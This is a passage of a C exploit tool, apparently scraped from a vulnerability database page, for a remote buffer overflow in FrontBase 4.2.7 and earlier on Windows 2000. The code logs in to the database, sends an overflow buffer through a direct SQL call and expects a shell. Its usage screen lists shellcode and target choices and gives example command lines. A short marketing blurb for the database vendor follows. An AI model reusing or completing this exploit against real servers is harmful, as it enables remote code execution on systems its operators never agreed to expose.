	meta&nbsp;=&nbsp;fbcdcCreateSession(fbdc,&nbsp;session_name,&nbsp;user,&nbsp;password,&nbsp;\"system_user\");
	if&nbsp;(fbcmdErrorsFound(meta)&nbsp;!=&nbsp;0)
	{
		printf(\"[-]&nbsp;Failed&nbsp;to&nbsp;create&nbsp;session
\");
		FBCErrorMetaData*&nbsp;emd&nbsp;=&nbsp;fbcdcErrorMetaData(fbdc,&nbsp;meta);
		char*&nbsp;msgs&nbsp;=&nbsp;fbcemdAllErrorMessages(emd);		
		fbcemdRelease(emd);
		free(msgs);
		fbcmdRelease(meta);
		fbcdcClose(fbdc);
		fbcdcRelease(fbdc);
		return&nbsp;-1;
	}&nbsp;&nbsp;&nbsp;
	fbcmdRelease(meta);
	printf(\"[+]&nbsp;Sending&nbsp;%d&nbsp;bytes&nbsp;of&nbsp;buffer&nbsp;to&nbsp;server,&nbsp;check&nbsp;the&nbsp;shell
\",&nbsp;strlen(buf));
		//&nbsp;if&nbsp;exploit&nbsp;success,&nbsp;the&nbsp;app&nbsp;will&nbsp;stop&nbsp;here.
	meta&nbsp;=&nbsp;fbcdcExecuteDirectSQL(fbdc,&nbsp;buf);
	if&nbsp;(fbcmdErrorsFound(meta)&nbsp;!=&nbsp;0)
	{
		printf(\"[-]&nbsp;Failed&nbsp;to&nbsp;send&nbsp;buffer
\");
		FBCErrorMetaData*&nbsp;emd&nbsp;=&nbsp;fbcdcErrorMetaData(fbdc,&nbsp;meta);
		char*&nbsp;msgs&nbsp;=&nbsp;fbcemdAllErrorMessages(emd);		
		fbcemdRelease(emd);
		free(msgs);
		fbcmdRelease(meta);
		fbcdcClose(fbdc);
		fbcdcRelease(fbdc);
		return&nbsp;-1;
	}
	fbcmdRelease(meta);
	return&nbsp;1;
}


//&nbsp;-----------------------------------------------------------------
//&nbsp;XGetopt.cpp&nbsp;&nbsp;Version&nbsp;1.2
//&nbsp;-----------------------------------------------------------------
int&nbsp;getopt(int&nbsp;argc,&nbsp;char&nbsp;*argv[],&nbsp;char&nbsp;*optstring)
{
	static&nbsp;char&nbsp;*next&nbsp;=&nbsp;NULL;
	if&nbsp;(optind&nbsp;==&nbsp;0)
		next&nbsp;=&nbsp;NULL;

	optarg&nbsp;=&nbsp;NULL;

	if&nbsp;(next&nbsp;==&nbsp;NULL&nbsp;||&nbsp;*next&nbsp;==&nbsp;\'\')
	{
		if&nbsp;(optind&nbsp;==&nbsp;0)
			optind++;

		if&nbsp;(optind&nbsp;>=&nbsp;argc&nbsp;||&nbsp;argv[optind][0]&nbsp;!=&nbsp;\'-\'&nbsp;||&nbsp;argv[optind][1]&nbsp;==&nbsp;\'\')
		{
			optarg&nbsp;=&nbsp;NULL;
			if&nbsp;(optind&nbsp;<&nbsp;argc)
				optarg&nbsp;=&nbsp;argv[optind];
			return&nbsp;EOF;
		}

		if&nbsp;(strcmp(argv[optind],&nbsp;\"--\")&nbsp;==&nbsp;0)
		{
			optind++;
			optarg&nbsp;=&nbsp;NULL;
			if&nbsp;(optind&nbsp;<&nbsp;argc)
				optarg&nbsp;=&nbsp;argv[optind];
			return&nbsp;EOF;
		}

		next&nbsp;=&nbsp;argv[optind];
		next++;		//&nbsp;skip&nbsp;past&nbsp;-
		optind++;
	}

	char&nbsp;c&nbsp;=&nbsp;*next++;
	char&nbsp;*cp&nbsp;=&nbsp;strchr(optstring,&nbsp;c);

	if&nbsp;(cp&nbsp;==&nbsp;NULL&nbsp;||&nbsp;c&nbsp;==&nbsp;\':\')
		return&nbsp;\'?\';

	cp++;
	if&nbsp;(*cp&nbsp;==&nbsp;\':\')
	{
		if&nbsp;(*next&nbsp;!=&nbsp;\'\')
		{
			optarg&nbsp;=&nbsp;next;
			next&nbsp;=&nbsp;NULL;
		}
		else&nbsp;if&nbsp;(optind&nbsp;<&nbsp;argc)
		{
			optarg&nbsp;=&nbsp;argv[optind];
			optind++;
		}
		else
		{
			return&nbsp;\'?\';
		}
	}

	return&nbsp;c;
}
//&nbsp;-----------------------------------------------------------------
//&nbsp;-----------------------------------------------------------------
//&nbsp;-----------------------------------------------------------------





void&nbsp;usage(char&nbsp;*&nbsp;s)
{	
	printf(\"&nbsp;Usage:
\");
	printf(\"&nbsp;&nbsp;&nbsp;&nbsp;%s&nbsp;-h&nbsp;<host>&nbsp;-p&nbsp;<port>&nbsp;-s&nbsp;<shellcode>&nbsp;-t&nbsp;<target>&nbsp;-u&nbsp;<user>&nbsp;-p&nbsp;<password>&nbsp;-d&nbsp;<database>&nbsp;-D&nbsp;<dbpassword>
\",&nbsp;s);
&nbsp;&nbsp;&nbsp;&nbsp;printf(\"&nbsp;-----------------------------------------------------------------------&nbsp;
\");
	printf(\"&nbsp;Arguments:
\");
	printf(\"
\");
	printf(\"&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-h&nbsp;<host>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;the&nbsp;host&nbsp;IP&nbsp;to&nbsp;attack
\");
	printf(\"&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-p&nbsp;<port>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;the&nbsp;port&nbsp;of&nbsp;server&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(default:&nbsp;-1&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;)
\");
	printf(\"&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-s&nbsp;<shellcode>&nbsp;&nbsp;shellcode&nbsp;number&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(default:&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;)
\");
	printf(\"&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-t&nbsp;<target>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;target&nbsp;number&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(default:&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;)
\");
	printf(\"&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-t&nbsp;<target>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;target&nbsp;number&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(default:&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;)
\");
	printf(\"&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-u&nbsp;<user>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;user&nbsp;name&nbsp;of&nbsp;frontbase&nbsp;&nbsp;(default:&nbsp;_SYSTEM)
\");
	printf(\"&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-p&nbsp;<passwrod>&nbsp;&nbsp;&nbsp;user&nbsp;password&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(default:&nbsp;<blank>)
\");
	printf(\"&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-d&nbsp;<database>&nbsp;&nbsp;&nbsp;database&nbsp;(if&nbsp;port&nbsp;=&nbsp;-1)&nbsp;(default:&nbsp;<blank>)
\");
	printf(\"&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-d&nbsp;<dbpassword>&nbsp;database&nbsp;password&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(default:&nbsp;<blank>)
\");
	printf(\"
\");
	printf(\"&nbsp;&nbsp;&nbsp;&nbsp;Shellcodes:
\");
	for(int&nbsp;i=0;&nbsp;shellcodes[i].name!=0;i++)
	{
		printf(\"&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;%d.&nbsp;%s&nbsp;Size=%d
\",i+1,shellcodes[i].name,&nbsp;strlen(shellcodes[i].shellcode));				
	}	
	printf(\"
\");
	printf(\"&nbsp;&nbsp;&nbsp;&nbsp;Targets:
\");
	for(int&nbsp;j=0;&nbsp;targets[j].t!=0;j++)
	{
		printf(\"&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;%d.&nbsp;%s
\",j+1,targets[j].t);
	}		
	printf(\"
\");
	printf(\"&nbsp;Examples:
\");
	printf(\"&nbsp;&nbsp;&nbsp;&nbsp;%s&nbsp;-h&nbsp;127.0.0.1&nbsp;-d&nbsp;NewDB
\",&nbsp;s);
	printf(\"&nbsp;&nbsp;&nbsp;&nbsp;%s&nbsp;-h&nbsp;127.0.0.1&nbsp;-p&nbsp;1155&nbsp;-u&nbsp;root&nbsp;-p&nbsp;dta&nbsp;-D&nbsp;dta&nbsp;-t&nbsp;1
\",&nbsp;s);
	printf(\"&nbsp;-----------------------------------------------------------------------&nbsp;
\");	
	
	
}

void&nbsp;logo()
{
	printf(\"&nbsp;#######################################################################&nbsp;
\");	
	printf(\"&nbsp;#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;____&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;__&nbsp;&nbsp;_&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;______&nbsp;&nbsp;__&nbsp;&nbsp;&nbsp;&nbsp;_____&nbsp;#
\");
	printf(\"&nbsp;#&nbsp;&nbsp;&nbsp;&nbsp;/&nbsp;__&nbsp;\\________&nbsp;&nbsp;_____/&nbsp;/_(_)_________&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;/&nbsp;__/\\&nbsp;\\/&nbsp;/&nbsp;&nbsp;&nbsp;/&nbsp;_&nbsp;&nbsp;/&nbsp;#
\");
	printf(\"&nbsp;#&nbsp;&nbsp;&nbsp;/&nbsp;/&nbsp;/&nbsp;/&nbsp;___/&nbsp;_&nbsp;\\/&nbsp;__&nbsp;/&nbsp;__/&nbsp;/&nbsp;___/&nbsp;__&nbsp;/&nbsp;___&nbsp;&nbsp;/&nbsp;/&nbsp;&nbsp;&nbsp;&nbsp;\\&nbsp;&nbsp;/&nbsp;&nbsp;&nbsp;/&nbsp;//&nbsp;/&nbsp;&nbsp;#
\");
	printf(\"&nbsp;#&nbsp;&nbsp;/&nbsp;/_/&nbsp;/&nbsp;/&nbsp;/&nbsp;&nbsp;___/&nbsp;/_//&nbsp;/_/&nbsp;/&nbsp;/__/&nbsp;/_//&nbsp;/__/&nbsp;/&nbsp;_/&nbsp;&nbsp;&nbsp;&nbsp;/&nbsp;&nbsp;\\&nbsp;&nbsp;/&nbsp;___/&nbsp;&nbsp;&nbsp;#
\");
	printf(\"&nbsp;#&nbsp;/_____/_/&nbsp;&nbsp;\\___/&nbsp;\\_,_/\\__/_/\\___/\\__,_/&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;/_/&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;/_/\\_\\/_/&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#
\");
	printf(\"&nbsp;#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;crew&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#
\");
	printf(\"&nbsp;#######################################################################&nbsp;
\");	
	printf(\"&nbsp;#&nbsp;&nbsp;Exploit&nbsp;:&nbsp;Frontbase&nbsp;<=&nbsp;4.2.7&nbsp;for&nbsp;Windows&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;
\");
	printf(\"&nbsp;#&nbsp;&nbsp;Author&nbsp;&nbsp;:&nbsp;Heretic2&nbsp;([email protected])&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;
\");
	printf(\"&nbsp;#&nbsp;&nbsp;Version&nbsp;:&nbsp;1.1&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;
\");
	printf(\"&nbsp;#&nbsp;&nbsp;System&nbsp;&nbsp;:&nbsp;Windows&nbsp;2000&nbsp;SP4&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;
\");
	printf(\"&nbsp;#&nbsp;&nbsp;Date&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;25.03.2007&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;
\");
	printf(\"&nbsp;#&nbsp;-------------------------------------------------------------------&nbsp;#&nbsp;
\");
}

&nbsp;

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
26 Mar 2007 00:00Current
7.1High risk
Vulners AI Score7.1
frontbaseremote buffer overflowwindowsnetragard advisoryexploitsecurity vulnerabilityexploit writerdreatica-fxpadvisorycompiling
17